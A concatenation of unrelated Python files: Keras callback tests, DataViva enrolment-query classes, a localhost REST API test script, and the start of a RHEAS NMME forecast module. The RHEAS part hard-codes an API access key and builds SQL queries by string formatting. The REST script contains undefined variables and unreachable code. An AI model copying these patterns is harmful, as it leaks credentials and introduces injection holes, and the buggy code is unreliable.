np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.cached_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': batch})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_epoch_end(0, {'acc': 10.0})
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batch_summaries = []
self.epoch_summaries = []
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summaries.append((step, summary))
elif 'epoch_' in summary.value[0].tag:
self.epoch_summaries.append((step, summary))
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
# Epoch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(tb_cbk.writer.batch_summaries, [])
tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)
# Batch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
# Integer mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertFalse(tb_cbk.writer.batch_summaries)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
@test_util.run_deprecated_v1
def test_fit_generator_with_callback(self):
class TestCallback(keras.callbacks.Callback):
def set_model(self, model):
# Check the model operations for the optimizer operations that
# the _make_train_function adds under a named scope for the
# optimizer. This ensurs the full model is populated before the
# set_model callback is called.
optimizer_name_scope = 'training/' + model.optimizer.__class__.__name__
graph_def = ops.get_default_graph().as_graph_def()
for node in graph_def.node:
if node.name.startswith(optimizer_name_scope):
return
raise RuntimeError('The optimizer operations are not present in the '
'model graph when the Callback.set_model function '
'is called')
np.random.seed(1337)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=1,
validation_data=generator(),
validation_steps=2,
callbacks=[TestCallback()],
verbose=0)
if __name__ == '__main__':
test.main()
| |
# -*- coding: utf-8 -*-
from dataviva.api.sc.models import Yc_sc, Ysc, Ybc_sc, Ybs, Ybsc, Ys
from dataviva.api.attrs.models import School, Bra, Course_sc
from dataviva import db
from sqlalchemy import desc, func, not_
class AllBasicCourse:
def __init__(self):
self.max_year_subquery = None
self.scholar_query = None
self.max_year_subquery = db.session.query(func.max(Yc_sc.year))
self.scholar_query = Yc_sc.query.order_by(Yc_sc.enrolled.desc()).filter(Yc_sc.year == self.max_year_subquery)
def highest_enrolled_by_basic_course(self):
return self.scholar_query.first_or_404().enrolled
def highest_enrolled_by_basic_course_name(self):
bc = self.scholar_query.first_or_404()
return bc.course_sc.name()
class AllScholar:
def __init__(self):
self.max_year_subquery = None
self.scholar_query = None
self.max_year_subquery = db.session.query(func.max(Ys.year))
self.scholar_query = Ys.query.order_by(Ys.enrolled.desc()).filter(Ys.year == self.max_year_subquery)
def highest_enrolled_by_school(self):
return self.scholar_query.first_or_404().enrolled
def highest_enrolled_by_school_name(self):
sc = self.scholar_query.first_or_404()
return sc.school.name()
class Basic_course:
def __init__(self, course_sc_id):
self._statistics = None
self._sc = None
self.course_sc_id = course_sc_id
if self.course_sc_id is None:
self.max_year_subquery = db.session.query(func.max(Yc_sc.year))
self.course_query = Yc_sc.query.join(Course_sc).filter(Yc_sc.year == self.max_year_subquery)
else:
self.max_year_subquery = db.session.query(
func.max(Yc_sc.year)).filter_by(course_sc_id=course_sc_id)
self.course_query = Yc_sc.query.join(Course_sc).filter(
Yc_sc.course_sc_id == self.course_sc_id,
Yc_sc.year == self.max_year_subquery)
def __sc__(self):
if not self._sc:
sc = self.course_query.first_or_404()
self._sc = sc
return self._sc
def course_name(self):
course = self.__sc__()
return course.course_sc.name()
def course_classes(self):
course_classes = self.__sc__()
return course_classes.classes
def course_age(self):
course_age = self.__sc__()
return course_age.age
def course_enrolled(self):
course_enrolled = self.__sc__()
return course_enrolled.enrolled
def course_average_class_size(self):
total_class_number = self.__sc__().classes
total_enrolled_number = self.__sc__().enrolled
return total_enrolled_number / total_class_number
def course_year(self):
course_year = self.__sc__()
return course_year.year
def location_name(self):
return Bra.query.filter(Bra.id == self.bra_id).one().name()
def state_name(self):
return Bra.query.filter(Bra.id == self.bra_id[:3]).one().name()
class Basic_course_by_location(Basic_course):
def __init__(self, course_sc_id, bra_id):
Basic_course.__init__(self, course_sc_id)
self.bra_id = bra_id
self.max_year_subquery = db.session.query(
func.max(Ybc_sc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
self.course_query = Ybc_sc.query.join(Course_sc).filter(
Ybc_sc.course_sc_id == self.course_sc_id,
Ybc_sc.year == self.max_year_subquery,
Ybc_sc.bra_id == self.bra_id)
class Basic_course_school(Basic_course):
def __init__(self, course_sc_id):
Basic_course.__init__(self, course_sc_id)
self._sc_count = None
self.max_year_subquery = db.session.query(
func.max(Ysc.year)).filter_by(course_sc_id=course_sc_id)
self._sc_sorted_by_enrollment = None
self.total_schools_query = Ysc.query.filter(
Ysc.course_sc_id == self.course_sc_id,
Ysc.year == self.max_year_subquery)
def __sc_list__(self):
if not self._sc:
sc = self.total_schools_query.all()
self._sc = sc
return self._sc
def __sc_count__(self):
if not self._sc_count:
sc_count = self.__sc_list__().count()
self._sc_count = sc_count
return self._sc_count
def __sc_sorted_by_enrollment__(self):
if not self._sc_sorted_by_enrollment:
self._sc_sorted_by_enrollment = self.__sc_list__()
self._sc_sorted_by_enrollment.sort(key=lambda sc: sc.enrolled, reverse=True)
return self._sc_sorted_by_enrollment
def school_name(self):
sc = self.__sc_sorted_by_enrollment__()[0]
return sc.school.name()
def school_enrolled(self):
school_enrolled = self.__sc_sorted_by_enrollment__()[0]
return school_enrolled.enrolled
def school_count(self):
school_count = self.total_schools_query.count()
return school_count
class Basic_course_school_by_location(Basic_course_school):
def __init__(self, course_sc_id, bra_id):
Basic_course_school.__init__(self, course_sc_id)
self.bra_id = bra_id
self.max_year_subquery = db.session.query(
func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
self.total_schools_query = Ybsc.query.filter(
Ybsc.course_sc_id == self.course_sc_id,
Ybsc.year == self.max_year_subquery,
Ybsc.bra_id == self.bra_id)
class Basic_course_city(Basic_course):
def __init__(self, course_sc_id):
Basic_course.__init__(self, course_sc_id)
self._sc_city = None
self._city_sorted_by_enrollment = None
self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
Ybc_sc.course_sc_id == self.course_sc_id,
Ybc_sc.year == self.max_year_subquery,
Ybc_sc.bra_id_len == 9)
def __city_list__(self):
if not self._sc_city:
city_list = self.most_enrolled_city_query.all()
self._sc_city = city_list
return self._sc_city
def __city_sorted_by_enrollment__(self):
if not self._city_sorted_by_enrollment:
self._city_sorted_by_enrollment = self.__city_list__()
self._city_sorted_by_enrollment.sort(key=lambda sc: sc.enrolled, reverse=True)
return self._city_sorted_by_enrollment
def city_name(self):
city_name = self.__city_sorted_by_enrollment__()[0]
return city_name.bra.name()
def city_state(self):
city_state = self.__city_sorted_by_enrollment__()[0]
return city_state.bra.abbreviation
def city_enrolled(self):
city_enrolled = self.__city_sorted_by_enrollment__()[0]
return city_enrolled.enrolled
class Basic_course_by_state(Basic_course_city):
def __init__(self, course_sc_id, bra_id):
Basic_course_city.__init__(self, course_sc_id)
self.bra_id = bra_id
self.max_year_subquery = db.session.query(
func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
Ybc_sc.course_sc_id == self.course_sc_id,
Ybc_sc.year == self.max_year_subquery,
Ybc_sc.bra_id.like(self.bra_id+'%'),
Ybc_sc.bra_id_len == 3)
def location_rank(self):
state_name = self.__city_sorted_by_enrollment__()[0]
return state_name.bra.name()
def location_enrolled(self):
state_enrolled = self.__city_sorted_by_enrollment__()[0]
return state_enrolled.enrolled
class Basic_course_city_by_location(Basic_course_city):
def __init__(self, course_sc_id, bra_id):
Basic_course_city.__init__(self, course_sc_id)
self.bra_id = bra_id
self.max_year_subquery = db.session.query(
func.max(Ybsc.year)).filter_by(course_sc_id=course_sc_id, bra_id=bra_id)
self.most_enrolled_city_query = Ybc_sc.query.join(Bra).filter(
Ybc_sc.course_sc_id == self.course_sc_id,
Ybc_sc.year == self.max_year_subquery,
Ybc_sc.bra_id.like(str(self.bra_id)+'%'),
Ybc_sc.bra_id_len == 9)
class LocationSchool:
def __init__(self, bra_id):
self.bra_id = bra_id
self._sc_list = None
self._sc_sorted_by_enrollment = None
self.max_year_query = db.session.query(func.max(Ybs.year)).filter_by(bra_id=bra_id)
self.sc_query = db.session.query(
func.sum(Ybs.enrolled).label("enrolled"),
School).join(School).filter(
Ybs.bra_id == self.bra_id,
Ybs.year == self.max_year_query).group_by(Ybs.school_id)
def __sc_list__(self):
if not self._sc_list:
sc = self.sc_query.all()
self._sc_list = sc
return self._sc_list
def __sc_sorted_by_enrollment__(self):
if not self._sc_sorted_by_enrollment:
self._sc_sorted_by_enrollment = self.__sc_list__()
self._sc_sorted_by_enrollment.sort(key=lambda sc: sc.enrolled, reverse=True)
return self._sc_sorted_by_enrollment
def highest_enrolled_by_school(self):
sc_list = self.__sc_sorted_by_enrollment__()
if len(sc_list) != 0:
sc = sc_list[0]
return sc.enrolled
else:
return None
def highest_enrolled_by_school_name(self):
sc_list = self.__sc_sorted_by_enrollment__()
if len(sc_list) != 0:
sc = sc_list[0][1]
return sc.name()
else:
return None
class LocationBasicCourse(LocationSchool):
def __init__(self, bra_id):
LocationSchool.__init__(self, bra_id)
self.sc_query = db.session.query(
func.sum(Ybsc.enrolled).label("enrolled"),
Course_sc).join(Course_sc).filter(
Ybsc.bra_id == self.bra_id,
func.length(Ybsc.course_sc_id) == 5,
not_(Ybsc.course_sc_id.like('xx%')),
Ybsc.year == self.max_year_query).group_by(Ybsc.course_sc_id)
def highest_enrolled_by_basic_course(self):
sc_list = self.__sc_sorted_by_enrollment__()
if len(sc_list) != 0:
sc = sc_list[0]
return sc.enrolled
else:
return None
def highest_enrolled_by_basic_course_name(self):
sc_list = self.__sc_sorted_by_enrollment__()
if len(sc_list) != 0:
sc = sc_list[0][1]
return sc.name()
else:
return None
def year(self):
return self.max_year_query.first()[0]
| |
#!/usr/bin/python3
# coding: utf-8
import sys
import json
import requests
import pprint
import unittest
import string
import random
import os
import json
import time
import datetime
import base64
import uuid
import argparse
pp = pprint.PrettyPrinter(depth=6)
parser = argparse.ArgumentParser()
parser.add_argument('--quite',
help='Just print an OK at the end and fade out the printed data',
action='store_true')
args = parser.parse_args()
def pprnt(data):
if args.quite:
pass
else:
pp.pprint(data)
def random_image():
scrip_path = os.path.dirname(os.path.realpath(__file__))
image_path = os.path.join(scrip_path, 'data', 'plot.png')
with open(image_path, "rb") as f:
content = f.read()
return base64.b64encode(content)
def encode_snippet():
script_path = os.path.dirname(os.path.realpath(__file__))
snippet_path = os.path.join(script_path, 'data', 'snippet1.py')
with open(snippet_path, "rb") as f:
content = f.read()
return base64.b64encode(content)
def random_id():
return str(uuid.uuid4())[0:5]
def random_title(words):
words = ['Foo', 'Bar', 'Linux', 'Something', 'Yeah', 'Nope', 'Random', "REST", "IPv6"]
s = ' '.join(random.choice(words) for _ in range(1))
return s
def random_result():
d = ['passed', 'failed', 'nonapplicable' ]
return d[random.randint(0, len(d) - 1)]
def random_submitter():
d = ['anonym']
return d[random.randint(0, len(d) - 1)]
def query_full(id, sub_id):
url = 'http://localhost:8080/api/v1/object/{}/{}'.format(id, sub_id)
data = ''' '''
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
r = requests.get(url, data=data, headers=headers)
print("\nStatus Code:")
print(r.status_code)
print("\nRet Data:")
data = r.json()
pprnt(data)
def add_n(n):
url = 'http://localhost:8080/api/v1/object'
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
for i in range(n):
data = dict()
data["submitter"] = random_submitter()
data["object-item"] = dict()
data["object-item"]['categories'] = [ "team:orange", "topic:ip", "subtopic:route-cache" ]
data["object-item"]['version'] = 0
data['object-item']['title'] = "{}".format(random_title(3))
data['object-item']['data'] = list()
desc_data = dict()
desc_data['type'] = 'description'
desc_data['mime-type'] = 'text/markdown'
# base64 requires a byte array for encoding -> .encode('utf-8')
# json requires a string -> convert to UTF-8
desc_data['data'] = base64.b64encode(
"""
# Rooter: A Methodology for the Typical Unification of Access Points and Redundancy #
Collaboratively administrate empowered **markets** via plug-and-play networks.
Dynamically procrastinate __B2C users__ after installed base benefits. Dramatically
visualize customer directed convergence without **revolutionary ROI**.
int foo(void) {
abort(0);
}
* Item1
* Item2
* Item3
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.

## Harnessing Byzantine Fault Tolerance Using Classical Theory ##
Efficiently unleash cross-media information without cross-media value. Quickly
maximize **timely deliverables** for real-time schemas. Dramatically maintain
clicks-and-mortar __solutions__ without functional solutions.
Completely synergize resource taxing relationships via premier niche markets.
Professionally cultivate one-to-one customer service with robust ideas.
Dynamically innovate resource-leveling customer service for state of the art
customer service.
+---------+
| | +--------------+
| NFS |--+ | |
| | | +-->| CacheFS |
+---------+ | +----------+ | | /dev/hda5 |
| | | | +--------------+
+---------+ +-->| | |
| | | |--+
| AFS |----->| FS-Cache |
| | | |--+
+---------+ +-->| | |
| | | | +--------------+
+---------+ | +----------+ | | |
| | | +-->| CacheFiles |
| ISOFS |--+ | /var/cache |
| | +--------------+
+---------+
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.
## Shizzle Dizzle Header Second Order ##
Proctively envisioned multimedia based expertise and cross-media growth
strategies. Seamlessly visualize quality intellectual capital without superior
collaboration and idea-sharing. Holistically pontificate installed base portals
after maintainable products.
""".encode('utf-8')).decode("utf-8")
data['object-item']['data'].append(desc_data)
img_data = dict()
img_data['name'] = 'image.png'
img_data['mime-type'] = 'image/png'
img_data['data'] = random_image().decode("utf-8")
data['object-item']['data'].append(img_data)
img_data = dict()
img_data['name'] = 'trace.pcap'
img_data['mime-type'] = 'application/vnd.tcpdump.pcap'
img_data['data'] = "R0lGODlhDwAPAKECAAAAzxzM/////wAAACwAAAAADwAPAAACIISPeQHsrZ5ModrLlN48CXF8m2iQ3YmmKqVlRtW4MLwWACH+H09wdGltaXplZCBieSBVbGVhZCBTbWFydFNhdmVyIQAAOw=="
data['object-item']['data'].append(img_data)
snippet_data = dict()
snippet_data['name'] = 'snippet.py'
snippet_data['image-name'] = None
# how name for snippet-image implement?
# snippet_data['image-name'] = None
snippet_data['mime-type'] = 'x-snippet-python-matlplotlib-png'
snippet_data['data'] = encode_snippet().decode('utf-8')
data['object-item']['data'].append(snippet_data)
data["attachment"] = dict()
data["attachment"]['references'] = [ "doors:234236", "your-tool:4391843" ]
data["attachment"]['tags'] = [ "ip", "route", "cache", "performance" ]
data["attachment"]['responsible'] = random_submitter()
# 1/4 of all achievements are anchored
# add data entry to achievement, can be everything
# starting from images, over log files to pcap files, ...
if random.randint(0, 3) == 0:
variety = dict()
variety['os-version'] = 'rhel23'
variety['platform'] = 'xeon-foo'
achievement["variety"] = variety
data["achievements"] = list()
#os.system('cls' if os.name == 'nt' else 'clear')
print("New Data:\n-----------\n")
print(json.dumps(data, sort_keys=True, separators=(',', ': '), indent=4))
print("\n-----------\n")
dj = json.dumps(data, sort_keys=True, separators=(',', ': '))
r = requests.post(url, data=dj, headers=headers)
print("Return Data:\n-----------\n")
ret_data = r.json()
print(json.dumps(ret_data, sort_keys=True, separators=(',', ': '), indent=4))
assert len(ret_data['data']['id']) > 0
processing_time = ret_data['processing-time']
sys.stderr.write("\nHTTPStatusCode: {} ServerProcTime {}s\n".format(r.status_code, processing_time))
query_full(ret_data['data']['id'], ret_data['data']['sub_id'])
time.sleep(1)
print("\r\n\n")
sys.exit(0)
print("\r\n\n")
url = 'http://localhost:8080/api/v1/objects'
data = '''
{
"limit": 0,
"ordering": "by-submitting-date-reverse",
"maturity-level": "all"
}
'''
headers = {'Content-type': 'application/json', 'Accept': 'application/json'}
r = requests.get(url, data=data, headers=headers)
print("\nStatus Code:")
print(r.status_code)
print("\nRet Data:")
data = r.json()
pprnt(data)
return r.status_code
if __name__ == '__main__':
status = add_n(1)
if status==200:
print("OK")
else:
print("FAIL")
| |
""" RHEAS module for retrieving meteorological forecasts/hindcasts
from the NMME model suite.
.. module:: nmme
:synopsis: Retrieve NMME meteorological forecast data
.. moduleauthor:: Kostas Andreadis <kandread@jpl.nasa.gov>
"""
import datasets
import rpath
import dbio
import subprocess
import tempfile
import os
import sys
import shutil
import zipfile
import random
import string
import numpy as np
from datetime import datetime, timedelta
import logging
def dates(dbname):
dts = datasets.dates(dbname, "precip.nmme")
return dts
def _writeCservConfig(bbox, startdate, enddate, varname, ens):
"""Write ClimateSERV configuration file."""
log = logging.getLogger(__name__)
with tempfile.NamedTemporaryFile(dir=".", delete=False) as fcfg:
fcfg.write("[DEFAULT]\n")
fcfg.write("APIAccessKey = 1dd4d855e8b64a35b65b4841dcdbaa8b_as\n")
fcfg.write("DatasetType = Seasonal_Forecast\n")
fcfg.write("OperationType = Download\n")
fcfg.write("EarliestDate = {0}\n".format(startdate.strftime("%m/%d/%Y")))
if (enddate - startdate).days > 180:
enddate = startdate + timedelta(180)
log.warning("NMME forecast range cannot be longer than 180 days. Resetting end date!")
fcfg.write("LatestDate = {0}\n".format(enddate.strftime("%m/%d/%Y")))
fcfg.write("SeasonalEnsemble = ens{0:02d}\n".format(ens))
fcfg.write("SeasonalVariable = {0}\n".format(varname))
coords = "[{0},{1}],[{2},{1}],[{2},{3}],[{0},{3}],[{0},{1}]".format(*bbox)
fcfg.write("GeometryCoords = [{0}]\n".format(coords))
fcfg.write("BaseURL = https://climateserv.servirglobal.net/chirps/scriptAccess")
return fcfg.name
def _setEnsemble(dbname, sname, ens):
"""Set ensemble column in NMME data table."""
db = dbio.connect(dbname)
cur = db.cursor()
cur.execute("select * from raster_resampled where sname='{0}' and tname like 'nmme_%'".format(sname))
tables = [r[1] for r in cur.fetchall()]
for table in tables:
if not dbio.columnExists(dbname, sname, table, "ensemble"):
cur.execute("alter table {0}.{1} add column ensemble int".format(sname, table))
db.commit()
sql = "update {0}.{1} set ensemble = {2} where ensemble is null".format(sname, table, ens)
cur.execute(sql)
db.commit()
cur.close()
db.close()
def ingest(dbname, varname, filename, dt, ens):
"""Imports Geotif *filename* into database *dbname*."""
schema = {'Precipitation': 'precip', 'Temperature': 'tmax'}
db = dbio.connect(dbname)
cur = db.cursor()
cur.execute(
"select * from information_schema.tables where table_schema='{0}' and table_name='nmme'".format(schema[varname]))
if not bool(cur.rowcount):
cur.execute("create table {0}.nmme (rid serial not null primary key, fdate date, ensemble int, rast raster)".format(
schema[varname]))
db.commit()
cur.execute("select * from {0}.nmme where fdate='{1}' and ensemble = {2}".format(schema[varname], dt.strftime("%Y-%m-%d"), ens))
if bool(cur.rowcount):
cur.execute("delete from {0}.nmme where fdate='{1}' and ensemble = {2}".format(schema[varname], dt.strftime("%Y-%m-%d"), ens))
db.commit()
dbio.ingest(dbname, filename, dt, "{0}.nmme".format(schema[varname]), False, False)
sql = "update {0}.nmme set ensemble = {1} where ensemble is null".format(schema[varname], ens)
cur.execute(sql)
db.commit()
cur.execute("select * from raster_resampled where sname='{0}' and tname like 'nmme_%'".format(schema[varname]))
tables = [r[1] for r in cur.fetchall()]
for table in tables:
cur.execute("select * from {0}.{1} where fdate='{2}' and ensemble = {3}".format(schema[varname], table, dt.strftime("%Y-%m-%d"), ens))
if bool(cur.rowcount):
cur.execute("delete from {0}.{1} where fdate='{2}' and ensemble = {3}".format(schema[varname], table, dt.strftime("%Y-%m-%d"), ens))
db.commit()
tilesize = (10, 10)
dbio.createResampledTables(dbname, schema[varname], "nmme", dt, tilesize, False, "and ensemble={0}".format(ens))
_setEnsemble(dbname, schema[varname], ens)
cur.close()
db.close()
def download(dbname, dts, bbox=None):
